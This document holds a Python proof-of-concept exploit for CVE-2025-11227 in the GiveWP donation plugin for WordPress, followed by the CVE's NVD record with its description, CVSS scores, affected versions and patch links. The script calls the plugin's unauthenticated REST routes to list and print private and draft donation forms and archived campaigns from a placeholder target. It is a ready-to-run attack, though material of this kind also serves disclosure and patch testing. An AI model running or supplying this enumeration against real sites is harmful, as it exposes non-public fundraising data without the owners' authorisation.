CVE-2025-11227

# CVE-2025-11227 PoC - GiveWP Information Exposure # Exploits missing capability check in REST API routes import requests TARGET_URL = "http://target-wordpress-site.com" # Step 1: Enumerate all donation forms (including private and draft) def get_forms(target): """Retrieve all donation forms including private/draft ones""" url = f"{target}/wp-json/givewp/v3/forms/" headers = { "User-Agent": "Mozilla/5.0", "Accept": "application/json" } response = requests.get(url, headers=headers) if response.status_code == 200: forms = response.json() print(f"[+] Found {len(forms)} donation forms") for form in forms: print(f" - ID: {form.get('id')}, Title: {form.get('title')}, Status: {form.get('status')}") return forms return None # Step 2: Get specific form details def get_form_details(target, form_id): """Retrieve details of a specific donation form""" url = f"{target}/wp-json/givewp/v3/forms/{form_id}" response = requests.get(url) if response.status_code == 200: return response.json() return None # Step 3: Enumerate all campaigns (including archived) def get_campaigns(target): """Retrieve all campaigns including archived ones""" url = f"{target}/wp-json/givewp/v3/campaigns/" response = requests.get(url) if response.status_code == 200: campaigns = response.json() print(f"[+] Found {len(campaigns)} campaigns") for campaign in campaigns: print(f" - ID: {campaign.get('id')}, Title: {campaign.get('title')}, Status: {campaign.get('status')}") return campaigns return None # Step 4: Get specific campaign details def get_campaign_details(target, campaign_id): """Retrieve details of a specific campaign""" url = f"{target}/wp-json/givewp/v3/campaigns/{campaign_id}" response = requests.get(url) if response.status_code == 200: return response.json() return None if __name__ == "__main__": print(f"[*] Targeting: {TARGET_URL}") forms = get_forms(TARGET_URL) campaigns = get_campaigns(TARGET_URL)

{"cve": {"id": "CVE-2025-11227", "sourceIdentifier": "[email protected]", "published": "2025-10-04T03:15:36.873", "lastModified": "2025-11-26T17:03:10.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 4.10.0 via the 'registerGetForm', 'registerGetForms', 'registerGetCampaign' and 'registerGetCampaigns' functions due to a missing capability check. This makes it possible for unauthenticated attackers to extract data from private and draft donation forms, as well as archived campaigns."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "4.10.1", "matchCriteriaId": "8DC55D80-8F3E-4BCF-A8E5-077D85206D39"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/give/tags/4.9.0/src/API/REST/V3/Routes/Campaigns/RegisterCampaignRoutes.php#L60", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/give/tags/4.9.0/src/API/REST/V3/Routes/Campaigns/RegisterCampaignRoutes.php#L91", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/give/tags/4.9.0/src/DonationForms/Routes/DonationFormsEntityRoute.php#L52", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/give/tags/4.9.0/src/DonationForms/Routes/DonationFormsEntityRoute.php#L82", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3371948%40give&new=3371948%40give&sfp_email=&sfph_mail=", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/54db1807-69ff-445c-9e02-9abce9fd3940?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}